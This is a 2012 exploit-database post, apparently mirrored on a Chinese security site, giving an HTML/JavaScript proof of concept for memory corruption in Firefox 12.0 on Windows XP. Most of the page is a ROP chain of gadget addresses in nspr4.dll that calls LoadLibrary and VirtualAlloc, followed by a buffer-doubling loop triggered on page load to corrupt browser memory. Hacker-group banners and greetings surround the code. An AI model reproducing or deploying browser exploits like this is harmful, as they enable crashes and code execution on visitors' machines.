|
Mozilla FireFox 12.0 Memory Corruption (with ROP)
|
|
来源: http://fb.me/Inj3ct0rK3d 作者:KedAns-Dz 发布时间:2012-05-21
|
|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Mozilla FireFox 12.0 Memory Corruption (with ROP)
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com
# platform : Windows
# Type : Local
# Security Risk : High
# Tested on : Windows XP-SP3 (Fr)
###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha |
# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** |
# | ------------------------------------------------- < |
##
./<3 <3 Greetings t0 Palestine <3 <3
<html>
<head>
<title>Memory Corruption bY KedAns-Dz</title>
<body onload="javascript:KedAns();">
<script language="JavaScript">
function KedAns()
{
// Start ROP { Target : nspr4.dll } =>
var rop =unescape("%ubfc1%u1000"); // POP ECX / RETN
rop+=unescape("%u0060%u1002"); // ptr to &LoadLibraryW()
rop+=unescape("%uf986%u1000"); // MOV EAX,DWORD PTR DS:[ECX] / RETN
rop+=unescape("%uf5ef%u1000"); // POP EBX / RETN
rop+=unescape("%u0000%u0000"); // clear ebx
rop+=unescape("%u6f51%u1000"); // ADD EBX,EAX / XOR EAX,EAX / RETN
rop+=unescape("%ucf2c%u1000"); // POP EDX / RETN
rop+=unescape("%uea03%u1001"); // RETN (ROP NOP)
rop+=unescape("%ubfc1%u1000"); // POP ECX / RETN
rop+=unescape("%u0c50%u0c0c"); // xul.dll (Unicode string)
rop+=unescape("%uee6a%u1000"); // POP EDI / RETN
rop+=unescape("%udda4%u1000"); // ADD ESP,0C / RETN - call LoadLibrary
rop+=unescape("%u4870%u1000"); // POP EAX / RETN
rop+=unescape("%u1ab4%u1000"); // ADD ESP,10 / POP ESI / RETN
rop+=unescape("%u58c3%u1000"); // PUSHAD / CALL EAX
rop+=unescape("%u0070%u0041"); // MOV EBP,ESP (nspr4.dll)
rop+=unescape("%u4142%u4142"); // Buffer Junk!
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0078%u0075"); // xul.dll
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");
rop+=unescape("%ucf2c%u1000"); // POP EDX / RETN
rop+=unescape("%u3374%u00a6"); // Delta to IAT VirtualAlloc()
rop+=unescape("%u8acf%u1001"); // ADD EAX,EDX / RETN
rop+=unescape("%u8dd1%u1000"); // MOV EAX,DWORD PTR DS:[EAX] / RETN
rop+=unescape("%ue0b8%u1000"); // POP ESI / RETN
rop+=unescape("%ue0b8%u1000"); // POP ESI / RETN
rop+=unescape("%u3f14%u1001"); // XCHG EAX,ESI / ADD DL,BYTE PTR DS:[EAX] / RETN
rop+=unescape("%u62d5%u1001"); // POP EBP / RETN
rop+=unescape("%u9d12%u1001"); // push esp / ret
rop+=unescape("%uf5ef%u1000"); // POP EBX / RETN
rop+=unescape("%u0001%u0000"); // 0x00000001-> ebx
rop+=unescape("%ucf2c%u1000"); // POP EDX / RETN
rop+=unescape("%u1000%u0000"); // 0x00001000-> edx
rop+=unescape("%u7e46%u1000"); // POP ECX / RETN
rop+=unescape("%u0040%u0000"); // 0x00000040-> ecx
rop+=unescape("%uaa6a%u1000"); // POP EDI / RETN
rop+=unescape("%uaa03%u1001"); // RETN (ROP NOP)
rop+=unescape("%u4870%u1000"); // POP EAX / RETN
rop+=unescape("%u4870%u1000"); // POP EAX / RETN
rop+=unescape("%u58c3%u1000"); // PUSHAD / CALL EAX
document.write(rop); // Just 4 make Extern Buffer
var buffer = '\x41\x42\x43' // ABC buffer
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer); // Crash Memory !
}
// [ Memory Corruption !! (*__^) ]
}
</script>
</head>
</body>
</html>
# << ThE|End
__________________________________________________
< I'm VerrY BusSyY :p (x__x) 0xFuFuCkcK 0xShsHiiiT >
--------------------------------------------------
\ ,__,
> Fr0m Z0nE 404! < \ (oo)_____
Inj3ct0r LAB (C) 2012 (__) K3d )\ OWASP Algeria
Dz Offenders & CA | HMD ||---|| * all Dz Hax0r5
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=======================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky * HMD-Cr3w
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * r00tw0rm.com
# packetstormsecurity.org * metasploit.com * Chivr0sky * OWASP Dz * All Security and Exploits Webs ..
#===================================================================================================
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
